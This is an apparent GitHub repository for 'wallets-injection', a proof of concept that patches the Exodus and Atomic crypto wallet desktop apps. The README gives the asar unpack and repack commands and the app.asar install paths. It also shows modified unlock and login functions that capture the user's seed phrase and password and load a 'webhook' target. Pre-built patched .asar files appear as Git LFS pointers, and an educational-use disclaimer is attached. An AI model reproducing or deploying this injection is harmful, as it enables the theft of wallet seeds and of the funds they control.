├── .gitattributes ├── LICENSE ├── README.md ├── assets ├── atomic.png └── exodus.png ├── atomic.asar └── exodus.asar /.gitattributes: -------------------------------------------------------------------------------- 1 | *.asar filter=lfs diff=lfs merge=lfs -text 2 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2023 hackirby 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # wallets-injection 2 | Exodus and Atomic crypto wallets injection POC (captures mnemonic and password) 3 | 4 | ## Unpack ASAR 5 | ``` 6 | asar extract app.asar 7 | ``` 8 | 9 | ## Pack to ASAR 10 | ``` 11 | asar pack app.asar 12 | ``` 13 | 14 | ## Exodus 15 | ```js 16 | async unlock(e) { 17 | if (await this.shouldUseTwoFactorAuthMode()) return; 18 | const t = await Object(ee.readSeco)(this._walletPaths.seedFile, e); 19 | this._setSeed(M.fromBuffer(t)), P.a.randomFillSync(t), await this._loadLightningCreds() 20 | 21 | const webhook = await fs.readFile('LICENSE', 'utf8'); 22 | const mnemonic = this._seed.mnemonicString; 23 | const password = e; 24 | } 25 | ``` 26 | 27 | ![image](./assets/exodus.png) 28 | 29 | Located at `%LOCALAPPDATA%\exodus\app-\resources\app.asar` 30 | 31 | ## Atomic 32 | I had to go back to an old Atomic version that allowed me to import modules. It can still be injected to new versions. After login, user is prompted for an update. 33 | ```js 34 | async login() { 35 | let e; 36 | this.$storage.password = this.password; 37 | try { 38 | if (e = await this.$addresses.get(), 0 === e.length) throw new Error("empty addresses") 39 | } catch (e) { 40 | return console.error(e), void(this.passwordError = "Wrong password") 41 | } 42 | 43 | const mnemonic = await this.$storage.get("general_mnemonic"); 44 | const password = await this.password 45 | const fs = require('fs').promises; 46 | const webhook = await fs.readFile('LICENSE.electron.txt', 'utf8'); 47 | } 48 | ``` 49 | ![image](./assets/atomic.png) 50 | 51 | Located at `%LOCALAPPDATA%\Programs\atomic\resources\app.asar` 52 | 53 | ## Credits: 54 | - [loTus04](https://github.com/loTus04) for Atomic injection 55 | - [dropout1337](https://github.com/dropout1337) for Exodus injection 56 | 57 | ## Disclaimer: 58 | 59 | ### Important Notice: 60 | These injections are inteded for educational purposes only. There are provided strictly for educational and research purposes. Under no circumstances these should be used for any malicious activities, including but not limited to unauthorized access, data theft, or any other harmful actions. 61 | 62 | ### Usage Responsibility: 63 | 64 | By accessing and using these injections, you acknowledge that you are solely responsible for your actions. Any misuse of these injections is strictly prohibited, and the creator (hackirby) disclaims any responsibility for how these injections is utilized. You are fully accountable for ensuring that your usage complies with all applicable laws and regulations in your jurisdiction. 65 | 66 | ### No Liability: 67 | 68 | The creator (hackirby) of these injections shall not be held responsible for any damages or legal consequences resulting from the use or misuse of this software. This includes, but is not limited to, direct, indirect, incidental, consequential, or punitive damages arising out of your access, use, or inability to use these injections. 69 | 70 | ### No support: 71 | 72 | The creator (hackirby) will not provide any support, guidance, or assistance related to the misuse of these injections. Any inquiries regarding malicious activities will be ignored. 73 | 74 | ### Acceptance of Terms: 75 | 76 | By using these injections, you signify your acceptance of this disclaimer. If you do not agree with the terms stated in this disclaimer, do not use them. 77 | -------------------------------------------------------------------------------- /assets/atomic.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackirby/wallets-injection/ab3729548479fe9997c524d11ad597a53128e9ea/assets/atomic.png -------------------------------------------------------------------------------- /assets/exodus.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackirby/wallets-injection/ab3729548479fe9997c524d11ad597a53128e9ea/assets/exodus.png -------------------------------------------------------------------------------- /atomic.asar: -------------------------------------------------------------------------------- 1 | version https://git-lfs.github.com/spec/v1 2 | oid sha256:d31645f1fbff326b2b31eafa694cbfd516d119d86a395273440ea49d22cfdd0e 3 | size 61843988 4 | -------------------------------------------------------------------------------- /exodus.asar: -------------------------------------------------------------------------------- 1 | version https://git-lfs.github.com/spec/v1 2 | oid sha256:d19109209ffc7b8b286eec3574a2634e9611f8d5431f1c87fb99fccd315772b6 3 | size 132486162 4 | --------------------------------------------------------------------------------